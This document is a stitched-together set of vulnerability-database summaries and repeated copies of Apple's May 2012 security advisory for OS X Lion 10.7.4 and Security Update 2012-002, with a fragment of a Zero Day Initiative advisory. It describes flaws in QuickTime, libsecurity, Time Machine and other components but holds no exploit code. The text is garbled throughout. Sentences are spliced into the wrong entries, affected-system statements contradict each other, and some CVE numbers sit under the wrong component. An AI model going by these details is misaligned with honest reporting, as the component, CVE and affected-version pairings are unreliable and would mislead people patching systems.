Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: A buffer underflow existed in the handling of MPEG files. CVE-ID CVE-2012-0660 : Justin Kim at Microsoft and Microsoft Vulnerability Research QuickTime Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A use after free issue existed in the handling of JPEG2000 encoded movie files. This issue does not affect systems prior to OS X Lion. These issues do not affect OS X Lion systems. CVE-ID CVE-2012-0870 : Andy Davis of NGS Secure CVE-2012-1182 : An anonymous researcher working with HP's Zero Day Initiative Security Framework Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the Security framework. Processing untrusted input with the Security framework could result in memory corruption. This issue does not affect 32-bit processes. CVE-ID CVE-2012-0662 : aazubel working with HP's Zero Day Initiative Time Machine Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may access a user's Time Machine backup credentials Description: The user may designate a Time Capsule or remote AFP volume attached to an AirPort Base Station to be used for Time Machine backups. Beginning with AirPort Base Station and Time Capsule Firmware Update 7.6, Time Capsules and Base Stations support a secure SRP-based authentication mechanism over AFP. However, Time Machine did not require that the SRP-based authentication mechanism was used for subsequent backup operations, even if Time Machine was initially configured or had ever contacted a Time Capsule or Base Station that supported it. An attacker who is able to spoof the remote volume could gain access to user's Time Capsule credentials, although not backup data, sent by the user's system. This issue is addressed by requiring use of the SRP-based authentication mechanism if the backup destination has ever supported it. CVE-ID CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc. X11 Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Applications that use libXfont to process LZW-compressed data may be vulnerable to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libXfont's handling of LZW-compressed data. This issue is addressed by updating libXfont to version 1.4.4. CVE-ID CVE-2011-2895 : Tomas Hoger of Red Hat Note: Additionally, this update filters dynamic linker environment variables from a customized environment property list in the user's home directory, if present. OS X Lion v10.7.4 and Security Update 2012-002 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either Security Update 2012-002 or OS X v10.7.4. For OS X Lion v10.7.3 The download file is named: MacOSXUpd10.7.4.dmg Its SHA-1 digest is: 04c53a6148ebd8c5733459620b7c1e2172352d36 For OS X Lion v10.7 and v10.7.2 The download file is named: MacOSXUpdCombo10.7.4.dmg Its SHA-1 digest is: b11d511a50d9b728532688768fcdee9c1930037f For OS X Lion Server v10.7.3 The download file is named: MacOSXServerUpd10.7.4.dmg Its SHA-1 digest is: 3cb5699c8ecf7d70145f3692555557f7206618b2 For OS X Lion Server v10.7 and v10.7.2 The download file is named: MacOSXServerUpdCombo10.7.4.dmg Its SHA-1 digest is: 917207e922056718b9924ef73caa5fcac06b7240 For Mac OS X v10.6.8 The download file is named: SecUpd2012-002Snow.dmg Its SHA-1 digest is: 9669fbd9952419e70ac20109cf4db37f9932e9f8 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2012-002.dmg Its SHA-1 digest is: 34da2dcbc8d45362f1d5e3b1b218112a729ae1c3 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPqtkzAAoJEGnF2JsdZQeee2MIAKAcBIY6k0LU2fDLThFoAgKh WkYpGmCwa7L6n02geHzWrUCK/P/0yGWzDDqLfKlKuKbXdEIRP2wZTlvrqZHLzNO/ nXgz3HN1Xbll8yVXrGMEsoTD23Q+2/ZKLGMlSDw3vgBTVi/g4Rcer4Eew5mTkaoA j4WkrzgVUIxCMrsWMMwu1SVaizBuTYbNVzCzV3JPF1H0zVtVKgwWjhTdOJ/RDksD sjZG1XIEqVyv1rNk5BtjxVPFaJGpf9mcHiH8XyKQ0bC6ToM2r3B++Layoc5k1K0V OxKGSfWOEbWi/KR6vlXyVbe7JnU7a/V0C25HXhnoMEtoTCleZACEByLVtBC87LU= =6Eiz -----END PGP SIGNATURE-----

The directory server in Directory Service in Apple Mac OS X 10.6.8 allows remote attackers to obtain sensitive information from process memory via a crafted message. Apple Mac OS X is prone to multiple information-disclosure vulnerabilities. Attackers can leverage these issues to gain access to sensitive information. Information obtained may aid in further attacks. Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-09-1 OS X Lion v10.7.4 and Security Update 2012-002 OS X Lion v10.7.4 and Security Update 2012-002 is now available and addresses the following: Login Window Available for: OS X Lion v10.7.3, OS X Lion Server v10.7.3 Impact: Remote admins and persons with physical access to the system may obtain account information Description: An issue existed in the handling of network account logins. The login process recorded sensitive information in the system log, where other users of the system could read it. The sensitive information may persist in saved logs after installation of this update. See http://support.apple.com/kb/TS4272 for more information on how to securely remove any remaining records. This issue only affects systems running OS X Lion v10.7.3 with users of Legacy File Vault and/or networked home directories. CVE-ID CVE-2012-0652 : Terry Reeves and Tim Winningham of the Ohio State University, Markus 'Jaroneko' Raty of the Finnish Academy of Fine Arts, Jaakko Pero of Aalto University, Mark Cohen of Oregon State University, Paul Nelson Bluetooth Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A local user may be able to execute arbitrary code with system privileges Description: A temporary file race condition issue existed in blued's initialization routine. CVE-ID CVE-2012-0649 : Aaron Sigel of vtty.com curl Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. curl disabled the 'empty fragment' countermeasure which prevented these attacks. This issue is addressed by enabling empty fragments. CVE-ID CVE-2011-3389 : Apple curl Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Using curl or libcurl with a maliciously crafted URL may lead to protocol-specific data injection attacks Description: A data injection issue existed in curl's handling of URLs. This issue is addressed through improved validation of URLs. This issue does not affect systems prior to OS X Lion. This issue does not affect OS X Lion systems. The Directory Server is disabled by default in non-server installations of OS X. CVE-ID CVE-2012-0651 : Agustin Azubel HFS Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Mounting a maliciously crafted disk image may lead to a system shutdown or arbitrary code execution Description: An integer underflow existed in the handling of HFS catalog files. CVE-ID CVE-2012-0642 : pod2g ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in ImageIO's handling of CCITT Group 4 encoded TIFF files. This issue does not affect OS X Lion systems. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html CVE-ID CVE-2011-2692 CVE-2011-3328 ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libtiff's handling of ThunderScan encoded TIFF images. This issue is addressed by updating libtiff to version 3.9.5. CVE-ID CVE-2011-1167 Kernel Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: When FileVault is used, the disk may contain unencrypted user data Description: An issue in the kernel's handling of the sleep image used for hibernation left some data unencrypted on disk even when FileVault was enabled. This issue is addressed through improved handling of the sleep image, and by overwriting the existing sleep image when updating to OS X v10.7.4. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3212 : Felix Groebert of Google Security Team libarchive Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution Description: Multiple buffer overflows existed in the handling of tar archives and iso9660 files. CVE-ID CVE-2011-1777 CVE-2011-1778 libsecurity Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Verifying a maliciously crafted X.509 certificate, such as when visiting a maliciously crafted website, may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access issue existed in the handling of X.509 certificates. CVE-ID CVE-2012-0654 : Dirk-Willem van Gulik of WebWeaving.org, Guilherme Prado of Conselho da Justica Federal, Ryan Sleevi of Google libsecurity Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Support for X.509 certificates with insecure-length RSA keys may expose users to spoofing and information disclosure Description: Certificates signed using RSA keys with insecure key lengths were accepted by libsecurity. This issue is addressed by rejecting certificates containing RSA keys less than 1024 bits. CVE-ID CVE-2012-0655 libxml Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted web page may lead to an unexpected application termination or arbitrary code execution Description: Multiple vulnerabilities existed in libxml, the most serious of which may lead to an unexpected application termination or arbitrary code execution. These issues are addressed by applying the relevant upstream patches. CVE-ID CVE-2011-1944 : Chris Evans of Google Chrome Security Team CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-3919 : Juri Aedla LoginUIFramework Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: If the Guest user is enabled, a user with physical access to the computer may be able to log in to a user other than the Guest user without entering a password Description: A race condition existed in the handling of Guest user logins. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2012-0656 : Francisco Gomez (espectalll123) PHP Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Multiple vulnerabilities in PHP Description: PHP is updated to version 5.3.10 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP web site at http://www.php.net CVE-ID CVE-2011-4566 CVE-2011-4885 CVE-2012-0830 Quartz Composer Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A user with physical access to the computer may be able to cause Safari to launch if the screen is locked and the RSS Visualizer screen saver is used Description: An access control issue existed in Quartz Composer's handling of screen savers. This issue is addressed through improved checking for whether or not the screen is locked. CVE-ID CVE-2012-0657 : Aaron Sigel of vtty.com QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted movie file during progressive download may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of audio sample tables. CVE-ID CVE-2012-0658 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the handling of MPEG files. CVE-ID CVE-2012-0659 : An anonymous researcher working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: A buffer underflow existed in the handling of MPEG files. CVE-ID CVE-2012-0660 : Justin Kim at Microsoft and Microsoft Vulnerability Research QuickTime Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A use after free issue existed in the handling of JPEG2000 encoded movie files. This issue does not affect systems prior to OS X Lion. By sending a maliciously crafted packet, an unauthenticated remote attacker could cause a denial of service or arbitrary code execution with system privileges. These issues do not affect OS X Lion systems. CVE-ID CVE-2012-0870 : Andy Davis of NGS Secure CVE-2012-1182 : An anonymous researcher working with HP's Zero Day Initiative Security Framework Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the Security framework. Processing untrusted input with the Security framework could result in memory corruption. This issue does not affect 32-bit processes. CVE-ID CVE-2012-0662 : aazubel working with HP's Zero Day Initiative Time Machine Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may access a user's Time Machine backup credentials Description: The user may designate a Time Capsule or remote AFP volume attached to an AirPort Base Station to be used for Time Machine backups. Beginning with AirPort Base Station and Time Capsule Firmware Update 7.6, Time Capsules and Base Stations support a secure SRP-based authentication mechanism over AFP. However, Time Machine did not require that the SRP-based authentication mechanism was used for subsequent backup operations, even if Time Machine was initially configured or had ever contacted a Time Capsule or Base Station that supported it. An attacker who is able to spoof the remote volume could gain access to user's Time Capsule credentials, although not backup data, sent by the user's system. This issue is addressed by requiring use of the SRP-based authentication mechanism if the backup destination has ever supported it. CVE-ID CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc. X11 Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Applications that use libXfont to process LZW-compressed data may be vulnerable to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libXfont's handling of LZW-compressed data. This issue is addressed by updating libXfont to version 1.4.4. CVE-ID CVE-2011-2895 : Tomas Hoger of Red Hat Note: Additionally, this update filters dynamic linker environment variables from a customized environment property list in the user's home directory, if present. OS X Lion v10.7.4 and Security Update 2012-002 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either Security Update 2012-002 or OS X v10.7.4. For OS X Lion v10.7.3 The download file is named: MacOSXUpd10.7.4.dmg Its SHA-1 digest is: 04c53a6148ebd8c5733459620b7c1e2172352d36 For OS X Lion v10.7 and v10.7.2 The download file is named: MacOSXUpdCombo10.7.4.dmg Its SHA-1 digest is: b11d511a50d9b728532688768fcdee9c1930037f For OS X Lion Server v10.7.3 The download file is named: MacOSXServerUpd10.7.4.dmg Its SHA-1 digest is: 3cb5699c8ecf7d70145f3692555557f7206618b2 For OS X Lion Server v10.7 and v10.7.2 The download file is named: MacOSXServerUpdCombo10.7.4.dmg Its SHA-1 digest is: 917207e922056718b9924ef73caa5fcac06b7240 For Mac OS X v10.6.8 The download file is named: SecUpd2012-002Snow.dmg Its SHA-1 digest is: 9669fbd9952419e70ac20109cf4db37f9932e9f8 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2012-002.dmg Its SHA-1 digest is: 34da2dcbc8d45362f1d5e3b1b218112a729ae1c3 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPqtkzAAoJEGnF2JsdZQeee2MIAKAcBIY6k0LU2fDLThFoAgKh WkYpGmCwa7L6n02geHzWrUCK/P/0yGWzDDqLfKlKuKbXdEIRP2wZTlvrqZHLzNO/ nXgz3HN1Xbll8yVXrGMEsoTD23Q+2/ZKLGMlSDw3vgBTVi/g4Rcer4Eew5mTkaoA j4WkrzgVUIxCMrsWMMwu1SVaizBuTYbNVzCzV3JPF1H0zVtVKgwWjhTdOJ/RDksD sjZG1XIEqVyv1rNk5BtjxVPFaJGpf9mcHiH8XyKQ0bC6ToM2r3B++Layoc5k1K0V OxKGSfWOEbWi/KR6vlXyVbe7JnU7a/V0C25HXhnoMEtoTCleZACEByLVtBC87LU= =6Eiz -----END PGP SIGNATURE----- . Authentication is not required to exploit this vulnerability. The flaw exists within the libsecurity_cdsa_plugin which implements routines defined in libsecurity_cssm. The library defines an allocation routine as having an argument type uint32. The implemented methods in the cdsa_plugin accept parameter having type size_t, this value is truncated from 64 bits to 32 bits when being passed to the library routine. This can lead to an underallocated memory region and ultimately a write out of bounds. - -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT1222 - -- Disclosure Timeline: 2011-11-29 - Vulnerability reported to vendor 2012-08-17 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * aazubel - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUC5j51VtgMGTo1scAQJVbAf/eZ0SlfaZYtTyV0Iy6YUeeOD9mcRc3pHU 2A1qvoQryl5xDHvLh+m/iZZ+a3oQb8AtqWwRfZb4qpXA3cXIbd+qOtCU3yYX3oso 5h9Ag8iAbn79P+tMoWu0d6iwJIuw4RHMeoNtSnQ+Lzl8lwfJo7OItIaoXKEgiydS jTv69en5X65Fni0ofsXvKrZ4lu/PBZahhegy1Jd/5LmGCLTp6hRlhlhjmSD2CPBg yBYfQy844mfupGBSkgkUsjCt8kMJn0iDwW+NldfRGkxKUynoxCMV4C0shXe7lkfs x8ZDEe/7xy6R7+Qk/PBusKfBwWUfV2ns03EUTpgibKQxa+4wsu0uGw== =nb/B -----END PGP SIGNATURE-----

Buffer overflow in QuickTime in Apple Mac OS X before 10.7.4 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted audio sample tables in a movie file that is progressively downloaded. Apple Mac OS X is prone to a buffer overflow vulnerability that affects the QuickTime component. Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions. Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-09-1 OS X Lion v10.7.4 and Security Update 2012-002 OS X Lion v10.7.4 and Security Update 2012-002 is now available and addresses the following: Login Window Available for: OS X Lion v10.7.3, OS X Lion Server v10.7.3 Impact: Remote admins and persons with physical access to the system may obtain account information Description: An issue existed in the handling of network account logins. The login process recorded sensitive information in the system log, where other users of the system could read it. The sensitive information may persist in saved logs after installation of this update. See http://support.apple.com/kb/TS4272 for more information on how to securely remove any remaining records. This issue only affects systems running OS X Lion v10.7.3 with users of Legacy File Vault and/or networked home directories. CVE-ID CVE-2012-0652 : Terry Reeves and Tim Winningham of the Ohio State University, Markus 'Jaroneko' Raty of the Finnish Academy of Fine Arts, Jaakko Pero of Aalto University, Mark Cohen of Oregon State University, Paul Nelson Bluetooth Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A local user may be able to execute arbitrary code with system privileges Description: A temporary file race condition issue existed in blued's initialization routine. CVE-ID CVE-2012-0649 : Aaron Sigel of vtty.com curl Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. curl disabled the 'empty fragment' countermeasure which prevented these attacks. This issue is addressed by enabling empty fragments. CVE-ID CVE-2011-3389 : Apple curl Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Using curl or libcurl with a maliciously crafted URL may lead to protocol-specific data injection attacks Description: A data injection issue existed in curl's handling of URLs. This issue is addressed through improved validation of URLs. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2012-0036 Directory Service Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8 Impact: A remote attacker may obtain sensitive information Description: Multiple issues existed in the directory server's handling of messages from the network. By sending a maliciously crafted message, a remote attacker could cause the directory server to disclose memory from its address space, potentially revealing account credentials or other sensitive information. This issue does not affect OS X Lion systems. The Directory Server is disabled by default in non-server installations of OS X. CVE-ID CVE-2012-0651 : Agustin Azubel HFS Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Mounting a maliciously crafted disk image may lead to a system shutdown or arbitrary code execution Description: An integer underflow existed in the handling of HFS catalog files. This issue does not affect OS X Lion systems. This issue is addressed by updating libtiff to version 3.9.5. CVE-ID CVE-2011-1167 Kernel Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: When FileVault is used, the disk may contain unencrypted user data Description: An issue in the kernel's handling of the sleep image used for hibernation left some data unencrypted on disk even when FileVault was enabled. This issue is addressed through improved handling of the sleep image, and by overwriting the existing sleep image when updating to OS X v10.7.4. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3212 : Felix Groebert of Google Security Team libarchive Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution Description: Multiple buffer overflows existed in the handling of tar archives and iso9660 files. CVE-ID CVE-2011-1777 CVE-2011-1778 libsecurity Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Verifying a maliciously crafted X.509 certificate, such as when visiting a maliciously crafted website, may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access issue existed in the handling of X.509 certificates. CVE-ID CVE-2012-0654 : Dirk-Willem van Gulik of WebWeaving.org, Guilherme Prado of Conselho da Justica Federal, Ryan Sleevi of Google libsecurity Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Support for X.509 certificates with insecure-length RSA keys may expose users to spoofing and information disclosure Description: Certificates signed using RSA keys with insecure key lengths were accepted by libsecurity. This issue is addressed by rejecting certificates containing RSA keys less than 1024 bits. CVE-ID CVE-2012-0655 libxml Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted web page may lead to an unexpected application termination or arbitrary code execution Description: Multiple vulnerabilities existed in libxml, the most serious of which may lead to an unexpected application termination or arbitrary code execution. These issues are addressed by applying the relevant upstream patches. CVE-ID CVE-2011-1944 : Chris Evans of Google Chrome Security Team CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-3919 : Juri Aedla LoginUIFramework Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: If the Guest user is enabled, a user with physical access to the computer may be able to log in to a user other than the Guest user without entering a password Description: A race condition existed in the handling of Guest user logins. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2012-0656 : Francisco Gomez (espectalll123) PHP Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Multiple vulnerabilities in PHP Description: PHP is updated to version 5.3.10 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP web site at http://www.php.net CVE-ID CVE-2011-4566 CVE-2011-4885 CVE-2012-0830 Quartz Composer Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A user with physical access to the computer may be able to cause Safari to launch if the screen is locked and the RSS Visualizer screen saver is used Description: An access control issue existed in Quartz Composer's handling of screen savers. This issue is addressed through improved checking for whether or not the screen is locked. CVE-ID CVE-2012-0658 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the handling of MPEG files. CVE-ID CVE-2012-0659 : An anonymous researcher working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: A buffer underflow existed in the handling of MPEG files. This issue does not affect systems prior to OS X Lion. By sending a maliciously crafted packet, an unauthenticated remote attacker could cause a denial of service or arbitrary code execution with system privileges. These issues do not affect OS X Lion systems. CVE-ID CVE-2012-0870 : Andy Davis of NGS Secure CVE-2012-1182 : An anonymous researcher working with HP's Zero Day Initiative Security Framework Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the Security framework. Processing untrusted input with the Security framework could result in memory corruption. This issue does not affect 32-bit processes. CVE-ID CVE-2012-0662 : aazubel working with HP's Zero Day Initiative Time Machine Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may access a user's Time Machine backup credentials Description: The user may designate a Time Capsule or remote AFP volume attached to an AirPort Base Station to be used for Time Machine backups. Beginning with AirPort Base Station and Time Capsule Firmware Update 7.6, Time Capsules and Base Stations support a secure SRP-based authentication mechanism over AFP. However, Time Machine did not require that the SRP-based authentication mechanism was used for subsequent backup operations, even if Time Machine was initially configured or had ever contacted a Time Capsule or Base Station that supported it. An attacker who is able to spoof the remote volume could gain access to user's Time Capsule credentials, although not backup data, sent by the user's system. This issue is addressed by requiring use of the SRP-based authentication mechanism if the backup destination has ever supported it. CVE-ID CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc. X11 Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Applications that use libXfont to process LZW-compressed data may be vulnerable to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libXfont's handling of LZW-compressed data. This issue is addressed by updating libXfont to version 1.4.4. CVE-ID CVE-2011-2895 : Tomas Hoger of Red Hat Note: Additionally, this update filters dynamic linker environment variables from a customized environment property list in the user's home directory, if present. OS X Lion v10.7.4 and Security Update 2012-002 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either Security Update 2012-002 or OS X v10.7.4. For OS X Lion v10.7.3 The download file is named: MacOSXUpd10.7.4.dmg Its SHA-1 digest is: 04c53a6148ebd8c5733459620b7c1e2172352d36 For OS X Lion v10.7 and v10.7.2 The download file is named: MacOSXUpdCombo10.7.4.dmg Its SHA-1 digest is: b11d511a50d9b728532688768fcdee9c1930037f For OS X Lion Server v10.7.3 The download file is named: MacOSXServerUpd10.7.4.dmg Its SHA-1 digest is: 3cb5699c8ecf7d70145f3692555557f7206618b2 For OS X Lion Server v10.7 and v10.7.2 The download file is named: MacOSXServerUpdCombo10.7.4.dmg Its SHA-1 digest is: 917207e922056718b9924ef73caa5fcac06b7240 For Mac OS X v10.6.8 The download file is named: SecUpd2012-002Snow.dmg Its SHA-1 digest is: 9669fbd9952419e70ac20109cf4db37f9932e9f8 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2012-002.dmg Its SHA-1 digest is: 34da2dcbc8d45362f1d5e3b1b218112a729ae1c3 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPqtkzAAoJEGnF2JsdZQeee2MIAKAcBIY6k0LU2fDLThFoAgKh WkYpGmCwa7L6n02geHzWrUCK/P/0yGWzDDqLfKlKuKbXdEIRP2wZTlvrqZHLzNO/ nXgz3HN1Xbll8yVXrGMEsoTD23Q+2/ZKLGMlSDw3vgBTVi/g4Rcer4Eew5mTkaoA 